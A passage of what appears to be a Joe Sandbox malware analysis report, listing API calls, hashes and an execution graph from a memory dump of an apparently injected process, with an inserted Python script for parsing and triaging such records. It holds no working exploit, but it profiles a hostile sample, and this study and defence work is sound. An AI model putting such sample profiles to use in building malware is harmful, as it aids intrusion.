                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                          • malloc.MSVCRT ref: 00417407
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$??3@malloc
                                          • String ID:
                                          • API String ID: 4284152360-0
                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                          APIs
                                          • memset.MSVCRT ref: 0040F673
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                          • strlen.MSVCRT ref: 0040F6A2
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                          APIs
                                          • memset.MSVCRT ref: 0040F6E2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                          • strlen.MSVCRT ref: 0040F70D
                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                          APIs
                                          • memset.MSVCRT ref: 00402FD7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                          • strlen.MSVCRT ref: 00403006
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                          • String ID:
                                          • API String ID: 2754987064-0
                                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                          APIs
                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                          • String ID:
                                          • API String ID: 764393265-0
                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                          APIs
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Time$System$File$LocalSpecific
                                          • String ID:
                                          • API String ID: 979780441-0
                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                          APIs
                                          • memcpy.MSVCRT ref: 004134E0
                                          • memcpy.MSVCRT ref: 004134F2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$DialogHandleModuleParam
                                          • String ID:
                                          • API String ID: 1386444988-0
                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                          APIs
                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: InvalidateMessageRectSend
                                          • String ID: d=E
                                          • API String ID: 909852535-3703654223
                                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                          APIs
                                          • wcschr.MSVCRT ref: 0040F79E
                                          • wcschr.MSVCRT ref: 0040F7AC
                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcschr$memcpywcslen
                                          • String ID: "
                                          • API String ID: 1983396471-123907689
                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                          APIs
                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                          • _memicmp.MSVCRT ref: 0040C00D
                                          • memcpy.MSVCRT ref: 0040C024
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FilePointer_memicmpmemcpy
                                          • String ID: URL
                                          • API String ID: 2108176848-3574463123
                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfmemcpy
                                          • String ID: %2.2X
                                          • API String ID: 2789212964-323797159
                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintf
                                          • String ID: %%-%d.%ds
                                          • API String ID: 3988819677-2008345750
                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                          APIs
                                          • memset.MSVCRT ref: 0040E770
                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: F^@
                                          • API String ID: 568519121-3652327722
                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PlacementWindowmemset
                                          • String ID: WinPos
                                          • API String ID: 4036792311-2823255486
                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                          APIs
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                          • wcscat.MSVCRT ref: 0040DCFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileModuleNamewcscatwcsrchr
                                          • String ID: _lng.ini
                                          • API String ID: 383090722-1948609170
                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                          • API String ID: 2773794195-880857682
                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                          APIs
                                          • memcmp.MSVCRT ref: 00408AF3
                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                          • memcmp.MSVCRT ref: 00408B2B
                                          • memcmp.MSVCRT ref: 00408B5C
                                          • memcpy.MSVCRT ref: 00408B79
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID:
                                          • API String ID: 231171946-0
                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscat$wcscpy
                                          • String ID:
                                          • API String ID: 1961120804-0
                                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
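The per-function records above all follow one layout: an "APIs" list of `Name.MODULE(args), ref: addr` lines (some marked "Part of subcall function"), then "Similarity" fields such as API ID, String ID and API String ID, where the suffix after the dash is 0 when the record has no String ID. Reading a few hundred of these by eye is slow, so here is an added example, written for this page and not Joe Sandbox's own code, that parses records in that layout, groups them by API String ID (the three WideCharToMultiByte/WriteFile records above share 2754987064-0 at different addresses) and flags API combinations an analyst would look at first. The SAMPLE text is constructed to mirror the listing's layout, and the RULES table is this example's own assumption about what is worth flagging, not something the report states.

```python
"""Parse Joe Sandbox per-function records ('APIs' / 'Similarity' blocks) into
structured entries, group them by API String ID and flag API combinations
worth a triage look.  Added example, not Joe Sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample in the report's record layout (not copied from the report).
SAMPLE = """\
APIs
• memset.MSVCRT ref: 00417B7B
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
• GetLastError.KERNEL32 ref: 00417BB5
Memory Dump Source
• Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
• memset.MSVCRT ref: 00402FD7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
APIs
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2773794195-880857682
"""

# "• [Part of subcall function ADDR:] Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key Name: value" lines of the Similarity / Memory Dump Source sections
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<value>.*)$")

# Assumed triage rules: every group must contribute at least one API name.
RULES = [
    ("dynamic import resolution", [{"LoadLibraryW", "LoadLibraryA"}, {"GetProcAddress"}]),
    ("locked file access", [{"LockFileEx"}, {"UnlockFileEx"}]),
    ("wide-to-ANSI conversion then file write", [{"WideCharToMultiByte"}, {"WriteFile"}]),
    ("module path probing", [{"GetModuleFileNameW"}, {"wcscat", "wcsrchr"}]),
]


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall: str = ""  # callee address when reported via "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def api_string_id(self):
        return self.fields.get("API String ID", "")

    def names(self):
        return {c.name for c in self.calls}


def parse_records(text):
    """Split the listing at each 'APIs' header and parse the lines that follow."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(), m["sub"] or ""))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["value"].strip()
    return records


def flags_for(record):
    names = record.names()
    return [label for label, groups in RULES if all(g & names for g in groups)]


def group_by_api_string_id(records):
    """Records with the same API String ID are the same API sequence at different addresses."""
    groups = defaultdict(list)
    for r in records:
        groups[r.api_string_id].append(r)
    return dict(groups)


def triage(text):
    rows = []
    for r in parse_records(text):
        rows.append({
            "api_string_id": r.api_string_id,
            "refs": [c.ref for c in r.calls],
            "apis": [c.name for c in r.calls],
            "strings": [s for s in r.fields.get("String ID", "").split("$") if s],
            "flags": flags_for(r),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["api_string_id"], row["apis"], row["strings"], row["flags"])
    dup = {k: len(v) for k, v in group_by_api_string_id(parse_records(SAMPLE)).items() if len(v) > 1}
    print("same API String ID at several addresses:", dup)
```

Run it over the copied text of a report's function listing; the API String ID grouping is the quick way to see how many distinct API sequences a dump actually contains, and the String ID column (here SHGetSpecialFolderPathW with shell32.dll) is what ties a record to the dynamically resolved import it uses.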

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:20.4%
                                          Signature Coverage:0.5%
                                          Total number of Nodes:847
                                          Total number of Limit Nodes:16
                                          execution_graph 34108 40fc40 70 API calls 34281 403640 21 API calls 34109 427fa4 42 API calls 34282 412e43 _endthreadex 34283 425115 76 API calls __fprintf_l 34284 43fe40 133 API calls 34112 425115 83 API calls __fprintf_l 34113 401445 memcpy memcpy DialogBoxParamA 34114 440c40 34 API calls 33239 444c4a 33258 444e38 33239->33258 33241 444c56 GetModuleHandleA 33242 444c68 __set_app_type __p__fmode __p__commode 33241->33242 33244 444cfa 33242->33244 33245 444d02 __setusermatherr 33244->33245 33246 444d0e 33244->33246 33245->33246 33259 444e22 _controlfp 33246->33259 33248 444d13 _initterm __getmainargs _initterm 33249 444d6a GetStartupInfoA 33248->33249 33251 444d9e GetModuleHandleA 33249->33251 33260 40cf44 33251->33260 33255 444dcf _cexit 33257 444e04 33255->33257 33256 444dc8 exit 33256->33255 33258->33241 33259->33248 33311 404a99 LoadLibraryA 33260->33311 33262 40cf60 33299 40cf64 33262->33299 33318 410d0e 33262->33318 33264 40cf6f 33322 40ccd7 ??2@YAPAXI 33264->33322 33266 40cf9b 33336 407cbc 33266->33336 33271 40cfc4 33354 409825 memset 33271->33354 33272 40cfd8 33359 4096f4 memset 33272->33359 33277 40d181 ??3@YAXPAX 33279 40d1b3 33277->33279 33280 40d19f DeleteObject 33277->33280 33278 407e30 _strcmpi 33281 40cfee 33278->33281 33383 407948 ??3@YAXPAX ??3@YAXPAX 33279->33383 33280->33279 33283 40cff2 RegDeleteKeyA 33281->33283 33284 40d007 EnumResourceTypesA 33281->33284 33283->33277 33286 40d047 33284->33286 33287 40d02f MessageBoxA 33284->33287 33285 40d1c4 33384 4080d4 ??3@YAXPAX 33285->33384 33289 40d0a0 CoInitialize 33286->33289 33364 40ce70 33286->33364 33287->33277 33381 40cc26 strncat memset RegisterClassA CreateWindowExA 33289->33381 33291 40d1cd 33385 407948 ??3@YAXPAX ??3@YAXPAX 33291->33385 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33382 40c256 PostMessageA 33293->33382 33296 40d061 ??3@YAXPAX 33296->33279 33300 40d084 DeleteObject 33296->33300 33297 40d09e 33297->33289 33299->33255 
